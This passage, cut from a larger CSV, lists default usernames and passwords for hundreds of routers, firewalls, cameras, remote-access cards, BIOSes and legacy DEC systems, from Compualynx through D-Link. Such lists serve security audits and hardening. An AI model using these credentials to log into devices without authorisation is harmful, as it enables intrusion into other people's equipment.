Server,all,multi,administrator,asecret,Admin,,\ncompualynx,SCM,,All Versions,administrator,asecret,,,\ncompualynx,SCM,all,multi,administrator,asecret,Admin,,\ncomputer associates,ControlIT,,,DEFAULT,default,,,\ncomputer associates,ControlIT,,Desktop/console access,DEFAULT,default,,,\ncomputerassociates,ControlIT,,ControlIT,DEFAULT,default,Desktop/console access,,\ncomtrend,CT-5361T,,192.168.1.1,root,12345,,,\ncomtrend,CT-5361T,,http192.168.2.1,user,12345,View Device Info Statistics and Error Log.,,\ncomtrend,CT-5361T,,http192.168.2.1,user,12345,View Device Info, and Error Log.,\ncomtrend,CT5361T,,http://192.168.1.1,admin,admin,user,,\ncomtrend,CT560,,http://192.168.1.1,aolbb,setup,Admin,,\ncomtrend,CT812M,all,192.168.30.1,admin,admin,Admin,web,\ncomtrend,CT812M,all,192.168.30.1,root,NetC0mmV3oo,Admin,telnet,\ncomtrend,Nexuszlink 3100u,,192.168.2.1,,,,,\ncomtrend,ct536+,,Multi,admin,,Admin,,\nconceptronic,C100BRS4H,,,admin,1234,,,\nconceptronic,C100BRS4H,,HTTP,admin,1234,,,\nconceptronic,CADSLR4,,HTTP/telnet,admin,password,Admin,Default IP 192.168.1.254,\nconceptronic,CADSLR4,,HTTP/telnet,anonymous,password,anon,Default IP 192.168.1.254,\nconceptronic,CFULLHDMAi,,telnet port 4836,,conceptronic2008,,,\nconceptronic,cdeskcam,1,,conceptronic,,,camera,\nconceptronic,cdeskcam,1.0,,conceptronic,,,camera,\nconcord,PC BIOS,,,,last,,,\nconcord,PC BIOS,,,,last,Admin,,\nconcord,PC BIOS,,Admin,,last,,,\nconexant,ACCESS RUNNER ADSL CONSOLE PORT 3.27,,Telnet,Administrator,admin,Admin,,\nconexant,PAE-CE81,,,admin,epicrouter,,,\nconexant,PAE-CE81,,Multi,admin,epicrouter,,,\nconexant,Router,,HTTP,,admin,Admin,yes,\nconexant,Router,,HTTP,,epicrouter,Admin,,\nconexant,Router,,HTTP,admin,amigosw1,Admin,,\nconexant,Router,,HTTP,admin,conexant,Admin,,\nconexant,Router,,HTTP,admin,epicrouter,Admin,,\nconexant,Router,,HTTP,admin,password,Admin,,\nconexant,four port ethernet switch,,,admin,epicrouter,,,\nconitec,3D Gamestudio,,Capek,Adam,29111991,,,\nconitec,3D Gamestudio,6.22,Serial,Adam,29111991,Capek,,\ncontrol4,Home Theater Controller AVMHTC1B,,,,ducati900ss,,,\ncontrol4,Home Theater Controller AVMHTC1B,,,root,t0talc0ntr0l4!,,,\ncorecess,3113,,Multi,admin,,Admin,,\ncorecess,6808 APC,,Telnet,corecess,corecess,User,,\ncorecess,Corecess 3112,,HTTP,Administrator,admin,Admin,,\ncovertix,SmartCipher,,,Admin,Admin,,,\ncoyotepoint,Equaliser 4,,,eqadmin - Serial port only,equalizer,,Free BSD,\ncoyotepoint,Equaliser 4,,,look,look,,Free BSD - Web Browser only,\ncoyotepoint,Equaliser 4,,,root ,,,Free BSD - Serial port only,\ncoyotepoint,Equaliser 4,,,root,,,Free BSD - Serial port only,\ncoyotepoint,Equaliser 4,,,touch,touch,,Free BSD - Web Browser only,\ncreative,2015U,,Multi,,,Admin,,\ncrystalview,OutsideView 32,,,,Crystal,,,\ncrystalview,OutsideView 32,,,,Crystal,Admin,,\ncrystalview,OutsideView 32,,Admin,,Crystal,,,\nctcunion,ATU-R130,81001a,Multi,root,root,Admin,,\nctx international,PC BIOS,,,,CTX_123,,,\nctx international,PC BIOS,,Admin,,CTX_123,,,\nctxinternational,PC BIOS,,Console,,CTX_123,Admin,,\ncyberguard,Firewall,,,cgadmin,cgadmin,,,\ncyberguard,SG300,,http://192.168.0.1,root,default,Administration,,\ncyberguard,SG560,,http://192.168.0.1,root,default,Administration,,\ncyberguard,SG565,,http://192.168.0.1,root,default,Administration,,\ncyberguard,all firewalls,all,console + passport1,cgadmin,cgadmin,Admin,,\ncybermax,PC BIOS,,,,Congress,,,\ncybermax,PC BIOS,,Admin,,Congress,,,\ncybermax,PC BIOS,,Console,,Congress,Admin,,\ncyberoam,CR100ia,All,172.16.16.16,cyberoam,cyber,Admin,,\ncyberoam,CR15i,All,172.16.16.16,cyberoam,cyber,Admin,,\ncyberoam,CR25ia,All,172.16.16.16,cyberoam,cyber,Admin,,\ncyberoam,CR50ia,All,172.16.16.16,cyberoam,cyber,Admin,,\ncyberoam,Multiple,,,admin,admin,,,\ncyberoam,iView,,,admin,admin,,,\ncyberoam,iView,,,root,admin,,,\ncyclades,Cyclades-TS800,,TS800,root,tslinux,,,\ncyclades,MP/RT,,,super,surt,,,\ncyclades,PR-1000,,,super,surt,,,\ncyclades,PR-1000,,Telnet,super,surt,Admin,,\ncyclades,PR1000,,,super,surt,,,\ncyclades,TS800,,HTTP,root,tslinux,Admin,,\ncyclades,TS800,,telnet/ssh/http,root,,Admin,,\nd-link,604,,,Admin,,,,\nd-link,Cable/DSL Routers/Switches,,Admin,,admin,,,\nd-link,D-704P,,rev b,admin,,,,\nd-link,DCS-1000,,admin,,,,,\nd-link,DI-524,,Admin,admin,,,,\nd-link,DI-604,,Admin,user,,,,\nd-link,DI-604,,rev a rev b rev c rev e,admin,,,,\nd-link,DI-614+,,Admin,admin,,,,\nd-link,DI-614+,,User,user,,,,\nd-link,DI-624,,,admin,,,,\nd-link,DI-624,,192.168.0.1,Admin,,,,\nd-link,DI-701,,Admin,admin,year2000,,,\nd-link,DI-704,,rev a,,admin,,,\nd-link,DI-714P+,,192.168.0.1,admin,____BLANK___,,,\nd-link,DI-804,,Admin,admin,,,,\nd-link,DI-804,,v2.03,admin,,,,\nd-link,DSL-300,,,,private,,,\nd-link,DSL-300G+,,admin?,,private,,,\nd-link,DSL-504,,,,private,,,\nd-link,DSL-G664T,,,admin,admin,,,\nd-link,DWL 900AP,,,,public,,,\nd-link,DWL 900AP,,Admin,admin,public,,,\nd-link,Routers,,DI-764,admin,,,,\nd-link,hubs/switches,,,D-Link,D-Link,,,\ndaewoo,PC BIOS,,,,Daewuu,,,\ndaewoo,PC BIOS,,Admin,,Daewuu,,,\ndaewoo,PC BIOS,,Console,,Daewuu,Admin,,\ndallas semiconductors,TINI embedded JAVA Module,,<= 1.0,root,tini,,,\ndallas semiconductors,TINI embedded JAVA Module,,Admin,root,tini,,,\ndallas semiconductors,TINI embedded JAVA Module,,tini,Telnet,root,,,\ndallassemiconductors,TINI embedded JAVA Module,1,Telnet,root,tini,Admin,,\ndallassemiconductors,TINI embedded JAVA Module,1.0 or lower,Telnet,root,tini,Admin,,\ndallassemiconductors,TINI embedded JAVA Module,1.0,Telnet,root,tini,Admin,,\ndallassemiconductors,TINI embedded JAVA Module,below 1.0,Telnet,root,tini,Admin,,\ndarkman,ioFTPD,,root,ioFTPD,ioFTPD,,,\ndarkman,ioFTPD,all,Other,ioFTPD,ioFTPD,root,,\ndassaultsystemes,Enovia V6,,,Test Everything,,,,\ndata general,AOS/VS,,,op,operator,,,\ndata general,AOS/VS,,,operator,operator,,,\ndatacom,BSASX/101,,,,letmein,,,\ndatacom,BSASX/101,,,,letmein,Admin,,\ndatacom,BSASX/101,,Admin,,letmein,,,\ndatacom,NSBrowse,,,sysadm,sysadm,,,\ndatacom,NSBrowse,,,sysadm,sysadm,Admin,,\ndatageneral,AOS/VS,,multi,op,op,Admin,,\ndatageneral,AOS/VS,,multi,op,operator,Admin,,\ndatageneral,AOS/VS,,multi,operator,operator,Admin,,\ndatawizard.net,FTPXQ server,,,anonymous,any@,,,\ndatawizard.net,FTPXQ server,,read/write,anonymous,any,,,\ndatawizardtechnologiesinc,FtpQX server,,FTP,anonymous,(any),Read only on C: by default,,\ndatawizardtechnologiesinc,FtpQX server,,FTP,test,test,Test user has R/W permission on C: drive by default,,\ndavolink,DV2020,,,user,user,,,\ndavolink,DV2020,,Http://192.168.1.1,user,user,user settings,,\ndavox,Unison,,Multi,admin,admin,User,,\ndavox,Unison,,Multi,davox,davox,User,,\ndavox,Unison,,Multi,root,davox,Admin,,\ndavox,Unison,,Sybase,sa,,Admin,,\ndaytek,PC BIOS,,,,Daytec,,,\ndaytek,PC BIOS,,Admin,,Daytec,,,\ndaytek,PC BIOS,,Console,,Daytec,Admin,,\ndebian,Linux LILO Default,,2.2,,tatercounter2000,,,\ndebian,Linux LILO Default,2.2,console,,tatercounter2000,Admin,,\ndecnet,decnet,,,operator,admin,,,\ndecnet,decnet,,Guest,operator,admin,,,\ndeerfield,MDaemon,,HTTP,MDaemon,MServer,Admin,web interface to manage MDaemon. fixed June 2002,\ndeerfield,WorldClient and MDaemon,,5.0.5.0,MDaemon,MServer,,,\ndeerfield,WorldClient,5.0.5.0,,MDaemon,MServer,,Can be used to send/recv mail remotely,\ndell latitude cpx,dell,,,admin,admin,,,\ndell,B1260dn,,Web Console Via IP address,admin,dell00000,,,\ndell,CSr500xt,,,,admin,,,\ndell,CSr500xt,,Admin,,admin,,,\ndell,CSr500xt,,Multi,,admin,Admin,,\ndell,DRAC,,,root,calvin,,,\ndell,DRAC,,,root,calvin,management,,\ndell,ERA,,,root,calvin,,,\ndell,ERA,,,root,calvin,Admin - Embedded remote access,,\ndell,Inspiron,,Multi,,admin,Admin,,\ndell,Kace K2000,,,admin,admin,,,\ndell,Laser Printer 3000cn / 3100cn,,HTTP,admin,password,Admin,,\ndell,Latitude CMOS,CPi,console,,nx0nu4bbe,,Enter password then CTRL+Enter,\ndell,Latitude,,Admin,,1RRWTTOOI,,,\ndell,Latitude,,Bios D35B,,1RRWTTOOI,,,\ndell,Latitude,Bios D35B,Multi,,1RRWTTOOI,Admin,,\ndell,Lattitude CMOS,,CPi,,nz0u4bbe,,,\ndell,OpenManage Server Console,,,root,calvin,,,\ndell,OpenManage Server Console,,Admin,root,calvin,,,\ndell,OpenManage Server Console,,Console,root,calvin,Admin,,\ndell,PC BIOS,,,,Dell,,,\ndell,PC BIOS,,Admin,,Dell,,,\ndell,PC BIOS,,Console,,Dell,Admin,,\ndell,PowerConnect 2708,,192.168.2.1,admin,,Admin,,\ndell,PowerEdge 1655MC,,,admin,admin,Admin,,\ndell,PowerEdge 2650 RAC,,,root,calvin,,,\ndell,PowerEdge 2650 RAC,,HTTP,root,calvin,,,\ndell,PowerVault 35F,,,root,calvin,,,\ndell,PowerVault 50F,,,root,calvin,,,\ndell,PowerVault TL-2000/4000,,http://,Admin,secure,,,\ndell,Powerapp Web 100 Linux,,,root,powerapp,,RedHat 6.2,\ndell,Poweredge,,1655MC,admin,admin,,,\ndell,RAC,,,root,calvin,,,\ndell,Remote Access Card,,HTTP,root,calvin,Admin,,\ndell,Switch PowerConnect,,,admin,admin,,,\ndell,Switch PowerConnect,,,admin,admin,Admin,,\ndell,TrueMobile 1184 Wireless Broadband Gateway Router,,Admin,admin,admin,,,\ndell,TrueMobile 1184 Wireless Broadband Gateway Router,,HTTP,admin,admin,Admin,,\ndell,TrueMobile 1184 Wireless Broadband Gateway Router,,unknown,admin,admin,,,\ndell,TrueMobile 1184 Wireless Broadband Gateway Router,unknown,HTTP,admin,admin,Admin,,\ndell,TrueMobile 2300 Router,,,admin,admin,,,\ndell,Winterm,,,,Fireport,,,\ndell,Winterm,,,VNC,winterm,,,\ndell,Winterm,,,root,wyse,,,\ndell,Wyse Rapport,,,rapport,r@p8p0r+,,,\ndell,inspiron,,,,admin,,,\ndell,inspiron,,Admin,,admin,,,\ndell,latitude,,a05,,admin,,,\ndemarc,Network Monitor,,,admin,my_DEMARC,,,\ndemarc,Network Monitor,,Admin,admin,my_DEMARC,,,\ndemarc,Network Monitor,,multi,admin,my_DEMARC,Admin,,\ndeutschetelekom,T-Sinus 130 DSL,,HTTP,,0,Admin,,\ndeutschetelekom,T-Sinus 154 DSL,13.9.38,HTTP,,0,Admin,thx to AwdCzAb,\ndeutschetelekom,T-Sinus DSL 130,,HTTP,admin,,Admin,Usuallay also a WirelessLan AP :),\ndevelcon,Orbitor Default Console,,,,BRIDGE,,,\ndevelcon,Orbitor Default Console,,,,BRIDGE,Admin,,\ndevelcon,Orbitor Default Console,,,,password,,,\ndevelcon,Orbitor Default Console,,,,password,Admin,,\ndevelcon,Orbitor Default Console,,Admin,,BRIDGE,,,\ndevelcon,Orbitor Default Console,,Admin,,password,,,\ndictaphone,ProLog,,,NETOP,,,,\ndictaphone,ProLog,,,NETWORK,NETWORK,,,\ndictaphone,ProLog,,,PBX,PBX,,,\ndigiboard,Portserver 8 16,,,root,dbps,,any,\ndigiboard,Portserver 8 & 16,,,root,dbps,,any,\ndigicom,Michelangelo,,Multi,admin,michelangelo,Admin,,\ndigicom,Michelangelo,,Multi,user,password,User,,\ndigicorp,Router,,,,BRIDGE,Admin,,\ndigicorp,Router,,,,password,Admin,,\ndigicorp,Viper,,,,BRIDGE,,,\ndigicorp,Viper,,Admin,,BRIDGE,,,\ndigicorp,Viper,,Admin,,password,,,\ndigicorp,Viper,,Telnet,,BRIDGE,Admin,,\ndigicorp,Viper,,Telnet,,password,Admin,,\ndigicraft software,Yak!,,2.0.1,Yak,asd123,,,\ndigicraftsoftware,Yak!,2.0.1,FTP (default port 3535),Yak,asd123,,,\ndigiinternational,Digi One SP,all versions,http,root,dbps,Full configuration,Device default to DHCP for IP address.,\ndigital equipment,10-Dec,,,1,manager,,,\ndigital equipment,10-Dec,,,2,maintain,,,\ndigital equipment,10-Dec,,,2,operator,,,\ndigital equipment,10-Dec,,,30,games,,,\ndigital equipment,10-Dec,,,5,games,,,\ndigital equipment,10-Dec,,,7,maintain,,,\ndigital equipment,DEC-10,,,1,manager,,,\ndigital equipment,DEC-10,,,2,operator,,,\ndigital equipment,DEC-10,,,30,games,,,\ndigital equipment,DEC-10,,,5,games,,,\ndigital equipment,DEC-10,,,7,maintain,,,\ndigital equipment,DEC-10,,Admin,1,manager,,,\ndigital equipment,DEC-10,,Admin,1,operator,,,\ndigital equipment,DEC-10,,Admin,1,syslib,,,\ndigital equipment,DEC-10,,Admin,2,maintain,,,\ndigital equipment,DEC-10,,Admin,2,manager,,,\ndigital equipment,DEC-10,,Admin,2,operator,,,\ndigital equipment,DEC-10,,Admin,2,syslib,,,\ndigital equipment,DEC-10,,User,30,games,,,\ndigital equipment,DEC-10,,User,5,games,,,\ndigital equipment,DEC-10,,User,7,maintain,,,\ndigital equipment,DecServer,,,,ACCESS,,,\ndigital equipment,DecServer,,Admin,,ACCESS,,,\ndigital equipment,DecServer,,Admin,,SYSTEM,,,\ndigital equipment,IRIS,,,PDP11,PDP11,,,\ndigital equipment,IRIS,,,PDP8,PDP8,,,\ndigital equipment,IRIS,,,accounting,accounting,,,\ndigital equipment,IRIS,,,boss,boss,,,\ndigital equipment,IRIS,,,demo,demo,,,\ndigital equipment,IRIS,,,manager,manager,,,\ndigital equipment,IRIS,,,software,software,,,\ndigital equipment,IRIS,,Admin,accounting,accounting,,,\ndigital equipment,IRIS,,Admin,boss,boss,,,\ndigital equipment,IRIS,,Admin,manager,manager,,,\ndigital equipment,IRIS,,User,PDP11,PDP11,,,\ndigital equipment,IRIS,,User,PDP8,PDP8,,,\ndigital equipment,IRIS,,User,demo,demo,,,\ndigital equipment,IRIS,,User,software,software,,,\ndigital equipment,PC BIOS,,,,komprie,,,\ndigital equipment,PC BIOS,,Admin,,komprie,,,\ndigital equipment,RSX,,,,1,,,\ndigital equipment,RSX,,,1.1,SYSTEM,,,\ndigital equipment,RSX,,,BATCH,BATCH,,,\ndigital equipment,RSX,,,SYSTEM,MANAGER,,,\ndigital equipment,RSX,,,USER,USER,,,\ndigital equipment,RSX,,Admin,1.1,SYSTEM,,,\ndigital equipment,RSX,,Admin,SYSTEM,MANAGER,,,\ndigital equipment,RSX,,Admin,SYSTEM,SYSTEM,,,\ndigital equipment,RSX,,User,BATCH,BATCH,,,\ndigital equipment,RSX,,User,USER,USER,,,\ndigital equipment,Terminal Server,,,,access,,,\ndigital equipment,Terminal Server,,,,system,,,\ndigital equipment,Terminal Server,,Admin,,system,,,\ndigital equipment,Terminal Server,,User,,access,,,\ndigital equipment,VMS,,,ALLIN1,ALLIN1,,,\ndigital equipment,VMS,,,ALLIN1MAIL,ALLIN1MAIL,,,\ndigital equipment,VMS,,,ALLINONE,ALLINONE,,,\ndigital equipment,VMS,,,BACKUP,BACKUP,,,\ndigital equipment,VMS,,,DCL,DCL,,,\ndigital equipment,VMS,,,DECMAIL,DECMAIL,,,\ndigital equipment,VMS,,,DECNET,DECNET,,,\ndigital equipment,VMS,,,DECNET,NONPRIV,,,\ndigital equipment,VMS,,,DEFAULT,DEFAULT,,,\ndigital equipment,VMS,,,DEFAULT,USER,,,\ndigital equipment,VMS,,,DEMO,DEMO,,,\ndigital equipment,VMS,,,FIELD,DIGITAL,,,\ndigital equipment,VMS,,,FIELD,FIELD,,,\ndigital equipment,VMS,,,FIELD,SERVICE,,,\ndigital equipment,VMS,,,FIELD,TEST,,,\ndigital equipment,VMS,,,GUEST,GUEST,,,\ndigital equipment,VMS,,,HELP,HELP,,,\ndigital equipment,VMS,,,HELPDESK,HELPDESK,,,\ndigital equipment,VMS,,,HOST,HOST,,,\ndigital equipment,VMS,,,INFO,INFO,,,\ndigital equipment,VMS,,,INGRES,INGRES,,,\ndigital equipment,VMS,,,LINK,LINK,,,\ndigital equipment,VMS,,,MAILER,MAILER,,,\ndigital equipment,VMS,,,MBMANAGER,MBMANAGER,,,\ndigital equipment,VMS,,,MBWATCH,MBWATCH,,,\ndigital equipment,VMS,,,NETCON,NETCON,,,\ndigital equipment,VMS,,,NETMGR,NETMGR,,,\ndigital equipment,VMS,,,NETNONPRIV,NETNONPRIV,,,\ndigital equipment,VMS,,,NETPRIV,NETPRIV,,,\ndigital equipment,VMS,,,NETSERVER,NETSERVER,,,\ndigital equipment,VMS,,,NETWORK,NETWORK,,,\ndigital equipment,VMS,,,NEWINGRES,NEWINGRES,,,\ndigital equipment,VMS,,,NEWS,NEWS,,,\ndigital equipment,VMS,,,OPERVAX,OPERVAX,,,\ndigital equipment,VMS,,,POSTMASTER,POSTMASTER,,,\ndigital equipment,VMS,,,PRIV,PRIV,,,\ndigital equipment,VMS,,,REPORT,REPORT,,,\ndigital equipment,VMS,,,RJE,RJE,,,\ndigital equipment,VMS,,,STUDENT,STUDENT,,,\ndigital equipment,VMS,,,SYS,SYS,,,\ndigital equipment,VMS,,,SYSMAINT,DIGITAL,,,\ndigital equipment,VMS,,,SYSMAINT,SERVICE,,,\ndigital equipment,VMS,,,SYSMAINT,SYSMAINT,,,\ndigital equipment,VMS,,,SYSTEM,MANAGER,,,\ndigital equipment,VMS,,,SYSTEM,OPERATOR,,,\ndigital equipment,VMS,,,SYSTEM,SYSLIB,,,\ndigital equipment,VMS,,,SYSTEM,SYSTEM,,,\ndigital equipment,VMS,,,SYSTEST,UETP,,,\ndigital equipment,VMS,,,SYSTEST_CLIG,SYSTEST,,,\ndigital equipment,VMS,,,SYSTEST_CLIG,SYSTEST_CLIG,,,\ndigital equipment,VMS,,,TELEDEMO,TELEDEMO,,,\ndigital equipment,VMS,,,TEST,TEST,,,\ndigital equipment,VMS,,,UETP,UETP,,,\ndigital equipment,VMS,,,USER,PASSWORD,,,\ndigital equipment,VMS,,,USERP,USERP,,,\ndigital equipment,VMS,,,VAX,VAX,,,\ndigital equipment,VMS,,,VMS,VMS,,,\ndigitalequipment,10-Dec,,Multi,1,manager,Admin,,\ndigitalequipment,10-Dec,,Multi,1,operator,Admin,,\ndigitalequipment,10-Dec,,Multi,1,syslib,Admin,,\ndigitalequipment,10-Dec,,Multi,2,maintain,Admin,,\ndigitalequipment,10-Dec,,Multi,2,manager,Admin,,\ndigitalequipment,10-Dec,,Multi,2,operator,Admin,,\ndigitalequipment,10-Dec,,Multi,2,syslib,Admin,,\ndigitalequipment,10-Dec,,Multi,30,games,User,,\ndigitalequipment,10-Dec,,Multi,5,games,User,,\ndigitalequipment,10-Dec,,Multi,7,maintain,User,,\ndigitalequipment,DEC-10,,Multi,1,manager,Admin,,\ndigitalequipment,DEC-10,,Multi,1,operator,Admin,,\ndigitalequipment,DEC-10,,Multi,1,syslib,Admin,,\ndigitalequipment,DEC-10,,Multi,2,maintain,Admin,,\ndigitalequipment,DEC-10,,Multi,2,manager,Admin,,\ndigitalequipment,DEC-10,,Multi,2,operator,Admin,,\ndigitalequipment,DEC-10,,Multi,2,syslib,Admin,,\ndigitalequipment,DEC-10,,Multi,30,games,User,,\ndigitalequipment,DEC-10,,Multi,5,games,User,,\ndigitalequipment,DEC-10,,Multi,7,maintain,User,,\ndigitalequipment,DecServer,,Multi,,ACCESS,Admin,,\ndigitalequipment,DecServer,,Multi,,SYSTEM,Admin,,\ndigitalequipment,IRIS,,Multi,PDP11,PDP11,User,,\ndigitalequipment,IRIS,,Multi,PDP8,PDP8,User,,\ndigitalequipment,IRIS,,Multi,accounting,accounting,Admin,,\ndigitalequipment,IRIS,,Multi,boss,boss,Admin,,\ndigitalequipment,IRIS,,Multi,demo,demo,User,,\ndigitalequipment,IRIS,,Multi,manager,manager,Admin,,\ndigitalequipment,IRIS,,Multi,software,software,User,,\ndigitalequipment,PC BIOS,,Console,,komprie,Admin,,\ndigitalequipment,RSX,,Multi,1,,Level 1,,\ndigitalequipment,RSX,,Multi,1.1,SYSTEM,Admin,,\ndigitalequipment,RSX,,Multi,BATCH,BATCH,User,,\ndigitalequipment,RSX,,Multi,SYSTEM,MANAGER,Admin,,\ndigitalequipment,RSX,,Multi,SYSTEM,SYSTEM,Admin,,\ndigitalequipment,RSX,,Multi,USER,USER,User,,\ndigitalequipment,Terminal Server,,Port 7000,,access,User,,\ndigitalequipment,Terminal Server,,Port 7000,,system,Admin,,\ndigitalequipment,VMS,,Multi,ALLIN1,ALLIN1,,,\ndigitalequipment,VMS,,Multi,ALLIN1MAIL,ALLIN1MAIL,,,\ndigitalequipment,VMS,,Multi,ALLINONE,ALLINONE,,,\ndigitalequipment,VMS,,Multi,BACKUP,BACKUP,,,\ndigitalequipment,VMS,,Multi,DCL,DCL,,,\ndigitalequipment,VMS,,Multi,DECMAIL,DECMAIL,,,\ndigitalequipment,VMS,,Multi,DECNET,DECNET,,,\ndigitalequipment,VMS,,Multi,DECNET,NONPRIV,,,\ndigitalequipment,VMS,,Multi,DEFAULT,DEFAULT,,,\ndigitalequipment,VMS,,Multi,DEFAULT,USER,,,\ndigitalequipment,VMS,,Multi,DEMO,DEMO,,,\ndigitalequipment,VMS,,Multi,FIELD,DIGITAL,,,\ndigitalequipment,VMS,,Multi,FIELD,FIELD,,,\ndigitalequipment,VMS,,Multi,FIELD,SERVICE,,,\ndigitalequipment,VMS,,Multi,FIELD,TEST,,,\ndigitalequipment,VMS,,Multi,GUEST,GUEST,,,\ndigitalequipment,VMS,,Multi,HELP,HELP,,,\ndigitalequipment,VMS,,Multi,HELPDESK,HELPDESK,,,\ndigitalequipment,VMS,,Multi,HOST,HOST,,,\ndigitalequipment,VMS,,Multi,INFO,INFO,,,\ndigitalequipment,VMS,,Multi,INGRES,INGRES,,,\ndigitalequipment,VMS,,Multi,LINK,LINK,,,\ndigitalequipment,VMS,,Multi,MAILER,MAILER,,,\ndigitalequipment,VMS,,Multi,MBMANAGER,MBMANAGER,,,\ndigitalequipment,VMS,,Multi,MBWATCH,MBWATCH,,,\ndigitalequipment,VMS,,Multi,NETCON,NETCON,,,\ndigitalequipment,VMS,,Multi,NETMGR,NETMGR,,,\ndigitalequipment,VMS,,Multi,NETNONPRIV,NETNONPRIV,,,\ndigitalequipment,VMS,,Multi,NETPRIV,NETPRIV,,,\ndigitalequipment,VMS,,Multi,NETSERVER,NETSERVER,,,\ndigitalequipment,VMS,,Multi,NETWORK,NETWORK,,,\ndigitalequipment,VMS,,Multi,NEWINGRES,NEWINGRES,,,\ndigitalequipment,VMS,,Multi,NEWS,NEWS,,,\ndigitalequipment,VMS,,Multi,OPERVAX,OPERVAX,,,\ndigitalequipment,VMS,,Multi,POSTMASTER,POSTMASTER,,,\ndigitalequipment,VMS,,Multi,PRIV,PRIV,,,\ndigitalequipment,VMS,,Multi,REPORT,REPORT,,,\ndigitalequipment,VMS,,Multi,RJE,RJE,,,\ndigitalequipment,VMS,,Multi,STUDENT,STUDENT,,,\ndigitalequipment,VMS,,Multi,SYS,SYS,,,\ndigitalequipment,VMS,,Multi,SYSMAINT,DIGITAL,,,\ndigitalequipment,VMS,,Multi,SYSMAINT,SERVICE,,,\ndigitalequipment,VMS,,Multi,SYSMAINT,SYSMAINT,,,\ndigitalequipment,VMS,,Multi,SYSTEM,MANAGER,,,\ndigitalequipment,VMS,,Multi,SYSTEM,OPERATOR,,,\ndigitalequipment,VMS,,Multi,SYSTEM,SYSLIB,,,\ndigitalequipment,VMS,,Multi,SYSTEM,SYSTEM,,,\ndigitalequipment,VMS,,Multi,SYSTEST,UETP,,,\ndigitalequipment,VMS,,Multi,SYSTEST_CLIG,SYSTEST,,,\ndigitalequipment,VMS,,Multi,SYSTEST_CLIG,SYSTEST_CLIG,,,\ndigitalequipment,VMS,,Multi,TELEDEMO,TELEDEMO,,,\ndigitalequipment,VMS,,Multi,TEST,TEST,,,\ndigitalequipment,VMS,,Multi,UETP,UETP,,,\ndigitalequipment,VMS,,Multi,USER,PASSWORD,,,\ndigitalequipment,VMS,,Multi,USERP,USERP,,,\ndigitalequipment,VMS,,Multi,VAX,VAX,,,\ndigitalequipment,VMS,,Multi,VMS,VMS,,,\ndigitalequipment,decnet,,Multi,operator,admin,Guest,,\ndigium,AsteriskNOW,,,admin,password,,,\ndiscar,PMC30,,,SUPERVISOR,DISCAR,,,\ndiscar,PMC30,TODAS,Multi,SUPERVISOR,DISCAR,,,\ndivar,XF,,,admin,,,,\ndivar,XF,,,viewer,,,,\ndlink,,dir 655,,admin,blank,,,\ndlink,AC1200 Amplifi,gigabit model,192.168.0.1,,,Admin,,\ndlink,AC1200 Amplifi,rev.A,B,C,192.168.0.1,,Admin,\ndlink,AC1750 Amplifi,router,192.168.0.1,,,Admin,,\ndlink,AC1750 Wireless,rev.A,192.168.0.1,,,Admin,,\ndlink,AC1750 Wireless,rev.B,http://dlinkrouter.local.,,(see notes),Admin,The default password is printed on a card that comes with the router in this revision.,\ndlink,AC1900,router,192.168.0.1,,,Admin,,\ndlink,AC3150,router,192.168.0.1,,,Admin,,\ndlink,AC3200,router,192.168.0.1,,,Admin,,\ndlink,AC5300,router,192.168.0.1,,,Admin,,\ndlink,AC750 Wireless,router,192.168.0.1,admin,,Admin,,\ndlink,All Models,All Versions,192.168.0.1,,211cmw91765,user,,\ndlink,Cable/DSL Routers/Switches,,Multi,,admin,Admin,,\ndlink,D-704P,,Multi,admin,admin,Admin,,\ndlink,D-704P,rev b,Multi,admin,,Admin,,\ndlink,DAP-1150,,192.168.0.50,admin,,2012-01-08,,\ndlink,DAP-1155,1.00,http://192.160.0.50,admin,admin,,,\ndlink,DAP-1320,,http://dlinkap.local (see notes),Admin,,Admin,If there are multiple DAP-1320s,\ndlink,DAP-1650,,http://dlinkap.local. or http://192.168.0.50,Admin,,Admin,Wi-fi password will be the same as the router being extended,\ndlink,DCS-1000,,HTTP,,,admin,,\ndlink,DCS-2121,,,root,admin,,,\ndlink,DCS-2132L,,http://192.168.0.50,admin,,Admin,,\ndlink,DCS-2136L,camera,DHCP,admin,,Admin,,\ndlink,DCS-2310L,camera,DHCP,admin,,Admin,,\ndlink,DCS-2330L,,http,admin,,Admin,No default IP - use MyDlink to discover,\ndlink,DCS-2530L,camera,192.168.0.20,admin,,Admin,,\ndlink,DCS-2630L,camera,DHCP,admin,,Admin,,\ndlink,DCS-5020L,,http://192.168.0.20,admin,,Admin,,\ndlink,DCS-5025L,camera,192.168.0.20,admin,,Admin,,\ndlink,DCS-5030L,camera,192.168.0.20,admin,,Admin,,\ndlink,DCS-5222L,,http://192.168.0.20,admin,,Admin,,\ndlink,DCS-7010L,camera,DHCP,admin,,Admin,,\ndlink,DCS-930L,,http://192.168.0.20,admin,,Admin,,\ndlink,DCS-933L,,http://192.168.0.20,admin,,Admin,,\ndlink,DCS-935L,camera,10.255.255.1,admin,,Admin,,\ndlink,DCS-936L,camera,192.168.0.20,admin,,Admin,,\ndlink,DCS-942L,,http://192.168.0.20,admin,,Admin,,\ndlink,DCS-960L,camera,DHCP,admin,,Admin,,\ndlink,DFL-1100 firewall,,HTTP,admin,,Admin,,\ndlink,DFL-1600 firewall,,https://192.168.0.1,admin,admin,NetDefendOS Admin,,\ndlink,DFL-200 firewall,,HTTP,admin,,Admin,,\ndlink,DFL-200 firewall,,HTTP,admin,admin,Admin,,\ndlink,DFL-210 firewall,,https://192.168.0.1,admin,admin,NetDefendOS Admin,,\ndlink,DFL-300 firewall,,http://192.168.1.1,admin,admin,Admin,,\ndlink,DFL-700 firewall,,HTTP,admin,,Admin,,\ndlink,DFL-80 firewall,,http://192.168.1.1,admin,admin,Admin,,\ndlink,DFL-CP310 firewall,,http://my.firewall,admin,Management Interface Admin,,\ndlink,DFL-CP310 firewall,,http://my.firewall,admin,blank,Management Interface Admin,,\ndlink,DFL-CPG310 firewall,,http://my.firewall,admin,Management Interface Admin,,\ndlink,DFL-CPG310 firewall,,http://my.firewall,admin,blank,Management Interface Admin,,\ndlink,DFL-M510 